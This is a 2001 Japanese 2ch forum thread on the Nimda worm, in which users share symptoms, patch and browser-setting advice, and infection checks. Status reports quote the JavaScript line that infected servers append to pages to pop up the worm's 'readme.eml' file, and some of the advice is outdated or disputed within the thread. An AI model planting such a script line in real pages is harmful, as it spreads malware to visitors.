状況報告ver1.03(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> が追加される。
208 :
続き :01/09/19 14:47 ID:1L5pANOU
状況報告ver1.03(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
209 :
名無しさん :01/09/19 14:50 ID:ffTHrls6
IE4のSP2を使っているのですが、安全ですか? HDの余りも限られているし、OSも98(SEではない) なので、できればIE5にはしたくないのですが。
210 :
:01/09/19 14:50 ID:bCsgO3Gg
211 :
:01/09/19 14:50 ID:dvZoh28Q
>2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT スタートから検索を選んでCドライブを検索するだけでいいのですか?
212 :
フォローです :01/09/19 14:51 ID:N4U8iOCw
213 :
:01/09/19 14:52 ID:1L5pANOU
>>209 即死はないけど、直接ウイルスのファイルを踏まされると
DLダイアログが開くから拒否して
214 :
:01/09/19 14:53 ID:1L5pANOU
>>212 あ、悪いっす&了解。
変更しときます。
215 :
:01/09/19 14:54 ID:tLF66/ns
ぷくくくく、ぎゃははは。 ブラウザをあっぷでーとしたらウイルスが消えると思ってる天才くんがいるようだね。あはっはははは。最高!ネタだろ?
216 :
209 :01/09/19 14:55 ID:ffTHrls6
>>213 どうもありがとうございます。
気をつけますです。
217 :
:01/09/19 14:56 ID:bCsgO3Gg
今さっき1時間かけて5.0→5.5SP2に変えたけど 軽くなったよ 嬉しい
218 :
. :01/09/19 14:57 ID:72sY8luc
219 :
:01/09/19 14:57 ID:1L5pANOU
>>211 DL先の設定をDドライブとかにわざわざしていないなら、CだけでOK。
220 :
_ :01/09/19 14:58 ID:xHvJLsz6
>うちのパソコンにもウイルスいるよ。 名前はVBS.Haptime.A@mmつて奴。 いい感じに共存してるけどそろそろ手を切りたいな〜。 誰か教えてください(泣 いや、マジで。 検索したら殺リ方のってたけどよくわからんです。
221 :
:01/09/19 14:58 ID:dvZoh28Q
222 :
:01/09/19 15:03 ID:/LsUGfPI
>>220 さっさとウイルス対策ソフト買え・・・
(鉄壁とマカフィー以外の)
223 :
:01/09/19 15:04 ID:1L5pANOU
>>220 詳しくないならかえってまずいことになるので自分で直接ファイルを
いじらないでとりあえず、駆除できるウイルススキャンソフト購入するか、
OSをバックアップorセットアップから復帰しなおすしかないね。
今後もウイルスもらうこともあるかもしれないから、
ウイルススキャンソフト買う方がいろいろとお勧め。
224 :
どうして?? :01/09/19 15:05 ID:Dllf4gis
>>215 君はここのスレの題名が読めないのかしら?
スーパー初心者のためのMSNウィルスすれ。
あ、漢字読めないの?
すーぱーしょしんしゃのためのえむえすえぬすれ。
225 :
_ :01/09/19 15:05 ID:zYHPZHs6
とりあえず。みんな落ち着け。 今回のウイルスはそんなに怖くないぞ。 スクリプトの実行さえ切っておけば、とりあえずWeb閲覧だけでは 感染しないから。 慌ててIEのバージョンあげなくても大丈夫だ。
226 :
:01/09/19 15:06 ID:/LsUGfPI
age
227 :
:01/09/19 15:06 ID:sEBavJI2
msnのサーバがやられたのですか? んなら、hotmailのメールは、 それに感染しているということもありえるのですか?
228 :
:01/09/19 15:07 ID:LxtlZGLg
Internet Explorer 6 ならいいの?
229 :
:01/09/19 15:07 ID:OXw6lVdQ
俺的にはサーカムのほうがいやだったけどね。 再起動できなくなったし。
230 :
もふもふ :01/09/19 15:07 ID:5mJPrSNQ
msn訴えると僕は金持ちになれましゅか?
231 :
:01/09/19 15:09 ID:JSlZ/h2Q
>>224 それだと、 msn の質問ばかりになるんだろうな・・・
232 :
:01/09/19 15:09 ID:7112tIoU
>>230 アメリカで訴えろ!
懲罰的損害賠償(゚д゚)ウマーだ
233 :
:01/09/19 15:10 ID:N4U8iOCw
234 :
:01/09/19 15:10 ID:ied54yb2
235 :
:01/09/19 15:12 ID:gBmvSPfc
何か朝起きてPC起動したら、いつもより遅いんですけど、 それにネットなんか滅茶苦茶遅いし。。。
236 :
220だけど・・・ :01/09/19 15:12 ID:xHvJLsz6
ノートンつかってるんだけど、 VBSってのがいるよ!!と警告されて 完全ウイルススキャンしたんだけど引っかかってくれないのです。 なんかよくわかんないんだけど、設定とかが悪いのかな?
237 :
:01/09/19 15:12 ID:JgAOGVbo
ファイルのダウンードってウインドウが出たんだけど??
238 :
はあ? :01/09/19 15:13 ID:gvewi47.
MSNスレじゃねーわ!! 孫の代まで氏ね!
239 :
:01/09/19 15:13 ID:7jAGOnQE
SP2のインストールめんどくせぇや ジャバスクリプトきっとけば大丈夫?
240 :
:01/09/19 15:14 ID:md1OdAUE
スクリプトの実行を切るってどうやるの?
>>237 それはMSNウイルス対応済みのIEでMSNウイルスに感染したサイトを開いたときに
表示される。ダウンロードを始めてもいないのにウインドウが表示されるようなら、
キャンセルを押して閉じると良い。
242 :
:01/09/19 15:17 ID:/LsUGfPI
>>235 そうです。このウィルスのせいでネットは大混乱、テレホタイムでもないのに激重です。
243 :
IE4だが・・・ :01/09/19 15:19 ID:zYHPZHs6
>>240 デスクトップのIEのアイコンを右クリック
↓
プロパティを選択
↓
表示された画面の「セキュリティ」TABを選択
↓
セキュリティレベルの「カスタム」を選択し「設定ボタン」を押す
↓
下のほうにスクリプトの設定があるから「有効にする」を「無効にする」に変更
IEのバージョンによっては設定の場所が違うかも。
とりあえず、スクリプトを切れば、Webからの感染は防げる。
2chにも初心者がたくさんきているのだと知った 今日この頃。
245 :
:01/09/19 15:21 ID:oestFoJ6
Internet Explorer 6 にアップデートしたんだが 大丈夫ですか?
246 :
:01/09/19 15:21 ID:md1OdAUE
247 :
235 :01/09/19 15:22 ID:gBmvSPfc
>>242 なんだ、ビクーリした!自分も感染してるんじゃないかと思ったよ。
248 :
:01/09/19 15:22 ID:/LsUGfPI
age
249 :
:01/09/19 15:23 ID:/LsUGfPI
>>245 いちおう正式公開されたので大丈夫のはず。
ただ別のウイルス(ワーム)に引っかかる可能性が捨てきれないので、
これからも随時アップデート情報を追いかけておきましょう。
251 :
:01/09/19 15:24 ID:JgAOGVbo
スレッド一覧クリックしたら、 文字化けしたぞ!!!! おれだけか???
どうにかこうにかやってみたのですが、 45分ほどかかるというので、ちょっと目を離していたら 「(なんたらかんたら)へのアクセスはできませんでした」とかって なっててわけがわかりません。 もう一度このスレをゆっくり読んでやり直そうと思ったら (たぶん、途中でダメだったのだろう、と思って) 今度は選択できる一覧からPS2がなくて・・・・ で、インストールの履歴を見たら 『 Internet Explorer 5.5 Service Pack 2 と インターネット ツール - version 5,50,4807,2300 - の インストールが完了しました。 13:39:59 2001年9月19日 : 4795 』 となってるんです。 これはできてるってことですか? 私のPCはもう大丈夫ですか? どなたか教えてください。
253 :
:01/09/19 15:26 ID:17t7GA.M
ワイドショーで取り上げられてた W23 NIMDA ってウイルスがこれか? 世界大戦3 行政機関って意味だとかいって 馬鹿が持ち上げてたぞ。
254 :
おいおい :01/09/19 15:27 ID:9ejiBGFY
おいどっかのプルトニウムとか言うところのページに逝ったら 感染したよ ノートンに検索させたらヒットした IE6.0は駄目ダヨい
>>252 Windows Updateでそれが表示されていると言うことは、IEのインストール自体は
成功したと考えて良いでしょう。おそらくはなにか別のソフトウエアの
インストールに失敗したのでは?>「(なんたらかんたら)へのアクセスはできませんでした」
256 :
:01/09/19 15:28 ID:/LsUGfPI
>>254 デスクトップに新しくアイコンができてるはずだからクリックしてみて。
「Windows Update セットアップの再開」 だったかな?
257 :
:01/09/19 15:29 ID:e04NWwrc
>>252 IEのヘルプ→バージョン情報みてみそ。
>>254 それは単にIEのキャッシュにヒットしただけでは?
実行しなければ感染はしないよ。Nortonだと実行前に警告が上がってきて、
そこで「アクセス拒否」(だったかな?)を押せば実行しなくて済むはず。
259 :
:01/09/19 15:31 ID:.FNeXM3I
IEアップデートできません。 「タスクスケジューラの署名を確認しています」のところで、 DL失敗になります。何回やっても同じです。 何故でしょう?
260 :
:01/09/19 15:31 ID:PUKw48AA
うちには毎週日曜に必ずウィルスが送られてくるよ まじで相手を殺してー
261 :
:01/09/19 15:32 ID:fAFEbzjQ
ザ・ワイドでやるぞ
262 :
252 :01/09/19 15:32 ID:YmFZnDEE
>255さん レスありがとうございます。 とりあえずPS2はうまくいってるのですね。安心しました。 本当に本当に本当にどうもありがとうございます。 今日1番にアクセスしたのが2chでよかったです。 いつもいくどの板のトップにも緊急のお知らせがあったし、 この板と、特にこのスレの皆さんには感謝しています。 本当にありがとう。
>>259 IE自体がアップデートできていれば*今回のウイルスについては*問題ないはず。
ヘルプ→バージョン情報で "5.50.4807.2300" になっていればOK。
264 :
:01/09/19 15:33 ID:keGDeXIo
IE6.0はホントにだめなのでしょうか?
265 :
252 :01/09/19 15:33 ID:YmFZnDEE
>257さん ありがとうございます。 見てみます。
266 :
:01/09/19 15:36 ID:AmEHqk4c
>>254 インターネットオプションの全般にある一時ファイル空にしてもう一回
スキャンしてみて。
よければその結果も教えて
267 :
:01/09/19 15:38 ID:JSlZ/h2Q
>>255 IE UPDATE が途中で止まると、「(なんたらかんたら)へのアクセスはできませんでした」 って
でないっけ?
まぁその場合にはデスクトップに「Windows Update セットアップの再開」 っていうアイコンが
できるんだけども。
>>264 手元で試しているが問題ない。ただ、IEのバージョンが何であれ
感染したサイトに行くと「ダウンロードしますか?」が出てくるので
キャンセルすると良い。ちなみにこれはIEでなくてmozillaでもNetscape
でも出る。
IEの未対応バージョンだと「ダウンロードしますか?」が出ないでいきなり
実行してしまうので問題ってこと。
269 :
252 :01/09/19 15:39 ID:YmFZnDEE
>257さん 「更新バージョン:;SP2;」となっていました。 大丈夫そうです。ほっとしました。 親切にありがとうございました。 本当に親切な皆さん、ありがとうございます。
270 :
264 :01/09/19 15:41 ID:keGDeXIo
271 :
:01/09/19 15:42 ID:AmEHqk4c
既に感染していたらアップデートしても 意味ないからね。 ちゃんと感染の有無は確認してね>初心者ALL
272 :
259 :01/09/19 15:43 ID:.FNeXM3I
>>263 いえ、セットアップの再開になってしまうんです。
何度やってもダメです。
273 :
:01/09/19 15:43 ID:JSlZ/h2Q
274 :
:01/09/19 15:43 ID:9ejiBGFY
IE6.0でセキュリティ関係全部ONだと感染するよ というか感染した 鬱だ 氏脳
275 :
:01/09/19 15:45 ID:keGDeXIo
じゃあやっぱり IE5.5のほうがいいのでしょうか?
276 :
:01/09/19 15:46 ID:ilV2hG2w
>>271 どうやって感染を確かめるのでしょうか?
教えてくださいまし。
277 :
:01/09/19 15:46 ID:AmEHqk4c
>>274 そりゃ、無条件で全てを受け入れるってことだから
感染するよ。
DLとかactiveXとかのやばい物は表を歩く時でも
ダイアログ出すようにしないと
278 :
:01/09/19 15:46 ID:zYHPZHs6
279 :
:01/09/19 15:47 ID:LRM32VyM
>272 Windows Update はアンチウィルスソフトを無効にしとかないと失敗することがあるよ
280 :
ななし :01/09/19 15:48 ID:exibgqlk
参考になった。良スレであった。
281 :
276 :01/09/19 15:49 ID:ilV2hG2w
過去レス見たのでわかりました。 感染してませんでした。
282 :
:01/09/19 15:51 ID:YhkDggS.
IE6入れちったよ
283 :
ぺ ◆lPYiMAEY :01/09/19 15:52 ID:.iBHXJik
Windows Updateに繋ぐときは「Javaの許可」で「安全性-高」にしてたら 正常に表示されないことがある。「安全性-低」に設定すると大丈夫。
284 :
ナナシサソ :01/09/19 15:52 ID:uy8Pfu/w
現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm ・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
W32ニダ
286 :
:01/09/19 15:56 ID:oestFoJ6
JavaScriptの切り方教えて下さい。
287 :
:01/09/19 15:56 ID:gsbkGkZw
288 :
:01/09/19 15:57 ID:zYHPZHs6
>287は感染サイト!!! 叩かないように!
289 :
:01/09/19 15:57 ID:rJO4rUQE
>286 243を見れ
290 :
こぴぺ :01/09/19 16:00 ID:oaR/VUnY
930 : :01/09/19 15:58 ID:AmEHqk4c
>>923 やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。
291 :
:01/09/19 16:01 ID:ecPQDk4k
OutlookExpressで、メールおくったことあるのに、 emlファイルが全くないのは大丈夫なの?
292 :
:01/09/19 16:01 ID:FE2elL86
>感染鯖 > ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, >"resizable=no,top=6000,left=6000")</script></html> >が追加される。 JavaScript(JScript)で実行されてるのに JAVAの設定切って意味あんの?
293 :
にゃ :01/09/19 16:02 ID:IHdNh/Qs
だめだー、IEアップデートしたくてもできない ダイヤルアップだから途中で回線が切れてしまう とりあえずネットスケープ使ってるけどそれで大丈夫でしょうか?
294 :
:01/09/19 16:02 ID:g6whrLsI
ウィルス流通の温床と化してるアウトルック(エクスプレス)、何度も 散々痛い目見てるのに何故に使いつづけるかね…。ヴァカか?
295 :
:01/09/19 16:02 ID:QYFPL2LU
IE5.01SP2だけど念の為、と思って、HDを「readme.exe」で検索してみたら・・・ 「w32_nimda」とかそのまんまのファイル名とかが5〜6個出てきた!! ・・・でも良く見たらさっき見たサイトのTemporary Internet Filesだった。
>>291 emlはメール単体(1通分)のファイルです。
Outlook Expressでは、その中でメールをやり取りしているだけではmbxかdbxの
拡張子を持ったファイルに複数個のメールがいっしょに入ります。
従って、Outlook Expressでメール送受信をしているだけならemlは出てきません。
297 :
:01/09/19 16:04 ID:QpsLGwxM
MEでIE5.5なんですが、どうしたらいいの
298 :
:01/09/19 16:04 ID:ALUfLgrg
現時点で感染してなくてIEをSP2にアップしてJAVAとか切ったらもう安全? 実行ファイルを押さない限り安全?
299 :
:01/09/19 16:05 ID:oaR/VUnY
>>294 おすすめのメーラーってなに?
Netscape Mail 以外で。
300 :
:01/09/19 16:05 ID:AmEHqk4c
>>292 いやさ、元々初心者用に書いたから、
JAVAとjavaの違い説明するの面倒だったのよ。
しゃーねーなって流しといて(w
>>298 javascriptを切っておけば今回の問題についてはとりあえず安全。
あと、知らないファイルについて「ダウンロードしますか?」と聞かれた場合は
素直に「キャンセル」を押しましょう。
302 :
ういんどうずうんこ :01/09/19 16:08 ID:tLF66/ns
303 :
:01/09/19 16:08 ID:FE2elL86
>>300 >JAVAとjavaの違い
お前もわかってねーだろ。
304 :
:01/09/19 16:08 ID:7jAGOnQE
重くてやってらんねぇ 本屋行ってくる
305 :
dghjk :01/09/19 16:09 ID:gQ3gg2K.
>>294 わざわざ入れんのめんどくせえ。
Outlook Expressアンインストールできないし。
306 :
名無し :01/09/19 16:09 ID:VXd4MTO.
IE5.0なんですけど下のどれを入れたほうが良いと思います Internet Explorer 5.5 Service Pack 2 とインターネット ツール Internet Explorer 5.01 Service Pack 2
307 :
? :01/09/19 16:09 ID:Jr.kW5wI
どこで検索すればいいのかわかりません! 検索ってアウトルックで検索?
308 :
:01/09/19 16:10 ID:ALUfLgrg
>301 サンクスコ。あとは自己防衛でだいじょぶなんだね。 JAVAとかは普段から全部切ってるから安心だよ。 アクティブスクリプトを切るとバナー広告とかもでてこなくなるから便利だよな。
309 :
ぺ ◆lPYiMAEY :01/09/19 16:11 ID:.iBHXJik
>293 IEのツール(T)→インターネットオプションから、 「接続」タブ →「設定」ボタン →「ダイヤルアップの設定」の「プロパティ」 →「ダイヤル」タブ →「アイドル時の切断」チェックを外す これで回線は途中で切れないようになります。 デフォルトでは「20分たったら切断」となってるので これが原因かと。 違ってたらスマソ。
310 :
:01/09/19 16:11 ID:g6whrLsI
>>299 Becky!InternetMail
シェアウェア4000円とちと高いけど、複数アカウントでも使いやすい。
NetscapeMailは以前使ってたけど、複数のアカウントがまともに扱えなかったからねぇ。
311 :
:01/09/19 16:11 ID:rJO4rUQE
>307 Windowsのメニューから検索→ファイルやフォルダを選んで探したいものを入力する
>>307 スタートメニューの「検索」→「ファイルやフォルダ」
313 :
:01/09/19 16:12 ID:8hysENhc
アクティブXは有効でもいいんですか?
ネスケで良かった。ベキーで良かった。
315 :
:01/09/19 16:13 ID:XmuT0s7.
IE5.01SP2だと駄目なの? IE5.5SP2かIE6にしなきゃ駄目ってこと?
316 :
:01/09/19 16:13 ID:LZsmlQMs
マックでよかったヽ(´ー`)ノ
317 :
ぺ ◆lPYiMAEY :01/09/19 16:14 ID:.iBHXJik
>313 ActiveXのチェックボタンは、全て「無効」または 「ダイアログ表示」に設定しておくのがよろしい。
318 :
PC厨房 :01/09/19 16:14 ID:6Ah5JbSc
_____ /_ | /. \ ̄ ̄ ̄ ̄| / / ― ― | | / - - | ||| (6 > | | | | ┏━┓| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | | | | ┃─┃| < 正直、どんな被害が予想されるの?恐い・・・ || | | | \ ┃ ┃/ \________ | || | |  ̄  ̄|
319 :
:01/09/19 16:14 ID:oaR/VUnY
>>310 ありがと。
移行してもいいんだけど、一番気になるのは、Outlookで大量にたまった
過去メールもちゃんと移行できるかってことなんだよね。
以前もフリーソフトなんかをつかって移行をこころみたけど、結局うまく
いかなくて諦めた。
320 :
鬼畜 ver7.74 :01/09/19 16:14 ID:st2sa52k
林檎って楽だなーーーーー。 これを機会に林檎使いが増え・・る訳ないか・・。
321 :
ななし :01/09/19 16:15 ID:CcUhePas
ネスケメール、今では複数のアカウントに対応してるぜ。
322 :
:01/09/19 16:15 ID:SCBAE6rs
X68000でよかったヽ(´ー`)ノ
323 :
:01/09/19 16:15 ID:AmEHqk4c
303 javascript=Netscapeが考えたHTML埋め込み型script言語 元々はLiveScript。 JAVA=Sun Microsystemsが作ったJAVA言語 で確かあってるはずだが……
324 :
初心者 :01/09/19 16:19 ID:VXd4MTO.
JAVAを無効にするにはどうしたらいいの?
325 :
七資産 :01/09/19 16:19 ID:sChLgbv6
326 :
:01/09/19 16:19 ID:SCBAE6rs
327 :
:01/09/19 16:20 ID:4YsZA8ZQ
うーん、よく分からん。
329 :
:01/09/19 16:22 ID:SCBAE6rs
>>321 できるにはできるんだけど、いちいち別のプロファイルで再起動せねばならないのでは
使い物にならんということで…。
Becky!みたく一元的に複数アカウントの管理ができないとどうもね…。
330 :
315 :01/09/19 16:22 ID:XmuT0s7.
ようはIE5以上のSP2にして、readme.*みたいなファイルは 知らんぷりすれってこと?
331 :
:01/09/19 16:23 ID:kduBvuoU
Service Pack 2をインストール ってどうやってするんですか?
332 :
:01/09/19 16:23 ID:gsbkGkZw
>>330 そういうことです。今回の件に限ったことではないですが、少しでも「怪しい」と
思ったファイルは開かないのが吉です。IE5でSP2未満だと「開くか開かないか」
さえ聞いてこないのでこのスレで問題になっているのですが。
334 :
:01/09/19 16:24 ID:oaR/VUnY
>>326 ありがと。
mboxに直してくれるんだ。安心安心。
ちょっと試してみよ。
335 :
:01/09/19 16:25 ID:AvCgHDsA
>>333 怪しいと思わずにうっかり開いたらどうなるんですか?
336 :
七資産 :01/09/19 16:25 ID:sChLgbv6
>>328 うーん、なんか良くわからんが、HTMLメールに仕込まれてた場合はこれで回避できるって事?
337 :
:01/09/19 16:26 ID:zYHPZHs6
>>335 ウイルスチェックのソフトウエアが入っていて、かつ最新のパターンファイルに
なっていればウイルスチェックのソフトウエアで防御できる。
ただしウイルスチェック側で「開こうとしたファイル全てに対してウイルスを
チェックする」設定にしておかないと意味無し。
そうでない場合は感染する。
339 :
:01/09/19 16:28 ID:BwXoFOdw
SP2ダウンロードしてるんだけど 残り時間15時間12分、、、マジっすか?
>>339 みんな一斉にダウンロードしようとしてるから遅いんだと思う。
341 :
:01/09/19 16:29 ID:RmCCQsso
IE5.0なんですけど、IE5.01のSP2っていうのを DLしてもいいんでしょうか?
342 :
:01/09/19 16:29 ID:eovHWsSY
IE5.5SP一分ぐらいで落とせたんですけど、これでいいんですか?
343 :
_ :01/09/19 16:29 ID:h2Phf0JE
昨夜、調べ物してたら、QuickTimeの「〇〇を実行するには〇〇のプログラム をDLしないといけません。ダウンロードしますか?」と出たので、しないを 押したらブラウザが強制終了。 その後も別のサイトでそのダイアログ?が立ち上がったので、しつこいなぁと 思いつつ落としたのだが、その後またもやIEが強制終了。 今まで、QuickTime関連のダイアログなんか起動したことがなかったので変な感じ。 まさかなぁとは思うのだが…。 自宅はWin2000でIE5.5SP1…ヤバイ…ヤバすぎ。 コードレッド対策のときに、コードレッド用のセキュリティホールのパッチは あてたのだが…意味無し? どうしよ…早く家に帰りたい…。
344 :
:01/09/19 16:30 ID:5KhGe4rU
漏れいまだにIE4.0
345 :
:01/09/19 16:30 ID:3L/GxfkM
俺IE6.0テスト版なんだけどテスト版でも大丈夫なんかいな?
346 :
ななし :01/09/19 16:31 ID:CcUhePas
>>329 それがネスケ6(あれ、6.1だっけ?)からは同一プロファイルで
複数のアカウントに対応できるようになってんだな。
ちょっと感動した。
347 :
:01/09/19 16:31 ID:zYHPZHs6
>>339 ,
>>341 とりあえず、JavaScriptを切れば大丈夫だって。
JavaScriptの切り方は過去レス参照してね。
混んでるさなか、急いでDLする必要はない。
落ち着く事が第一です。
>>345 何があるか解らない(無保証なのがテスト版)ので、念のためIE6正式版をインストールすると良い。
349 :
あああ :01/09/19 16:31 ID:1SmjZecc
雑誌の付録で付いてるかな?
350 :
:01/09/19 16:32 ID:f7NLWTrQ
5.5のカスタマイズ版って書いてあるんだけど・・・ SP2ってどこでどうやって手に入れるの
>>349 IE6は難しいが、5.5SP2なら探せばあるはず。
352 :
342 :01/09/19 16:32 ID:eovHWsSY
あ、SP2です。
353 :
:01/09/19 16:32 ID:0vW2CaDA
しかし今さらながら なんでこんなことをするんだろうなぁ…
354 :
341 :01/09/19 16:32 ID:RmCCQsso
355 :
:01/09/19 16:33 ID:UjJVOzgA
>>339 今、パソコン3台にIE5.5SP2をDLしたけどISDNで1台50分
くらいだったよ
356 :
349 :01/09/19 16:34 ID:1SmjZecc
357 :
広末涼子(本物) :01/09/19 16:34 ID:lXFBnjJc
SP2で 「ダウンロードしますか?」ダイアログを キャンセルしても、 しっかりreadme.exe、readme.emlが出来ているはず。 削除々々!
358 :
:01/09/19 16:35 ID:3L/GxfkM
俺のPCのウイルススキャン用ソフト McAfee VirusScan Schedular 4.0.3a めちゃくちゃ古くないか?・・・鬱だ。
359 :
:01/09/19 16:36 ID:zeh.yX7c
360 :
:01/09/19 16:36 ID:gsbkGkZw
361 :
339 :01/09/19 16:37 ID:BwXoFOdw
>>340 そうですね、サイトがビジーのようでダウンロード中断されちゃいました。
>>347 ありがとうございます。
Javaは切ってるから大丈夫なんですけどちょっと気になったものですから、、、
この騒動が落ち着いた頃にマターリダウンロードすることにします。
>>360 ちゃんとMicrosoftからダウンロードしましょう。
# つーか、感染してるサイトっぽいな・・
# こっちからだとコネクションが確立できないので未確認だが。
363 :
:01/09/19 16:38 ID:t5ePDc5w
364 :
名無しさん :01/09/19 16:39 ID:eSUd69Ts
>344 俺も。 どうするよ。
365 :
初心者 :01/09/19 16:39 ID:3dIdB1mI
IE5.01SP2とIE5.5SP2って何が違うんですか?
>>363 "Temporary Internet Files" の中だと思う。
感染サイトにアクセスすると例外なく作られてしまうが、実行しなければ感染しない。
367 :
:01/09/19 16:39 ID:EXieD9aY
結局感染しても再セットアップすればいいのですか?
368 :
:01/09/19 16:39 ID:3L/GxfkM
よく分からない初心者は今すぐPCの電源切って寝てて下さい。
369 :
名無し :01/09/19 16:39 ID:t5ePDc5w
*.eml じゃなくて*.logのファイルがたくさんでているんだけど。これ 確実にウイルスだよね?
370 :
:01/09/19 16:40 ID:b.qLQcx6
ウィルスに感染していた場合 パソコン初期化すれば元に戻りますか?
371 :
:01/09/19 16:40 ID:5KhGe4rU
372 :
:01/09/19 16:41 ID:9X9vIrlE
今、ダウンロード中。 ADSLにしといて良かったと、初めて思った。
373 :
:01/09/19 16:41 ID:6741/eko
つい最近IE4.0から5.5に変えたが、心配かな? 雑誌のCDからインストルしたんだが。
374 :
ふぁあ :01/09/19 16:42 ID:1SmjZecc
w32.nimda.a@mm[1].htm こんなファイルあったからちょっとビックリした。 単なるシマンテックのキャッシュか。
375 :
:01/09/19 16:42 ID:f7NLWTrQ
>>370 感染してしまったら素直にフォーマットして再インストールするのが間違いないでしょう。
あと、少し待てば駆除ツールがどこかで公開されるかもしれないので、急がない人は
そういう方法でも大丈夫でしょう。
ただし、必要なファイルをバックアップする場合は、そのファイルが感染していないか
どうかを必ず確認しましょう。
状況報告ver1.05(前編) 感染前対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> が追加される。
極初心者なのは仕様が無いとしても、 過去レスくらい読みましょうよ.マジで. ネ(困. 漏れは産毛の生えかけた初心者だけど、 500レスまでくらいならキチリと読めるモンな(苦.
379 :
続き :01/09/19 16:44 ID:AmEHqk4c
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
380 :
:01/09/19 16:45 ID:f7NLWTrQ
381 :
fgん :01/09/19 16:46 ID:1SmjZecc
>>342 ダウンロードする為のプログラムっぽいな。
382 :
:01/09/19 16:47 ID:j1VFphlo
今ie5.5なんだけどie6.0にアップデートするときって 一度ie5.5はアンインストールせねばならんの?
383 :
z61-115-88-213.dialup.wakwak.ne.jp :01/09/19 16:47 ID:vAVHUk8c
ひまー
384 :
^^。 :01/09/19 16:48 ID:YqOIBj/g
>>375 今回のウィルス対策のjava設定するとWINDOWS UPDATEがみれないね。
385 :
:01/09/19 16:48 ID:b.qLQcx6
>376 レスありがとうございます
386 :
